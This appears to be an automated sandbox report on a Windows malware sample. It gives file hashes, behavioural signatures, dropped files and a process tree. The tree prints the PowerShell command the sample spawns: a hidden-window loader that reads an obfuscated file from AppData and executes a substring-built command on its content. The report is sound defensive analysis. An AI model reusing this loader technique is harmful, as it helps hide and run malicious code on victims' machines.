Analysis

  • max time kernel
    119s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240319-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240319-en, locale:en-us, os:windows7-x64, system
  • submitted
    17/04/2024, 14:19 UTC

General

  • Target
    e25d6621a38cc9d1dd2428d1886a5080ceec742e8c22fe754e31f6d81eaad44e.exe
  • Size
    574KB
  • MD5
    bae2b5f2ba2e3976d19f78cd57589b43
  • SHA1
    c8cbfb695d01b52a83790146fa2ff89de37447ad
  • SHA256
    e25d6621a38cc9d1dd2428d1886a5080ceec742e8c22fe754e31f6d81eaad44e
  • SHA512
    fbaf47cfac100602fbfdf7bb3d29261c822ef5bfee8f4931ac2f6310339734ca13aadd2fb51f7f36ddc54daf59591723c69daf1eea54d71203ad3608046b70e8
  • SSDEEP
    12288:U1JKwATSHsf9/erPv2OzvwvtV9Tj20z168E7rg3ONKUHOI:UhATSMV/eL+OzGTjxzk8QOyHL

Score
7/10

Malware Config

Signatures

  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e25d6621a38cc9d1dd2428d1886a5080ceec742e8c22fe754e31f6d81eaad44e.exe
    "C:\Users\Admin\AppData\Local\Temp\e25d6621a38cc9d1dd2428d1886a5080ceec742e8c22fe754e31f6d81eaad44e.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Caenostylic=Get-Content 'C:\Users\Admin\AppData\Roaming\kolossens\livrente\markedsfringsomkostnings\rigsombudsmndenes\Vildspors\Tjenestefries\Abrased.Wig';$Benraden=$Caenostylic.SubString(44385,3);.$Benraden($Caenostylic)"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2588

Network

MITRE ATT&CK Enterprise v15

Downloads

  • \Users\Admin\AppData\Local\Temp\nsd2F7A.tmp\nsExec.dll
    Filesize: 6KB
    MD5: 293165db1e46070410b4209519e67494
    SHA1: 777b96a4f74b6c34d43a4e7c7e656757d1c97f01
    SHA256: 49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a
    SHA512: 97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19
  • memory/2588-22-0x0000000073E70000-0x000000007441B000-memory.dmp
    Filesize: 5.7MB
  • memory/2588-23-0x0000000073E70000-0x000000007441B000-memory.dmp
    Filesize: 5.7MB
  • memory/2588-24-0x0000000002200000-0x0000000002240000-memory.dmp
    Filesize: 256KB
  • memory/2588-25-0x0000000002200000-0x0000000002240000-memory.dmp
    Filesize: 256KB
  • memory/2588-26-0x0000000002200000-0x0000000002240000-memory.dmp
    Filesize: 256KB
  • memory/2588-27-0x0000000073E70000-0x000000007441B000-memory.dmp
    Filesize: 5.7MB
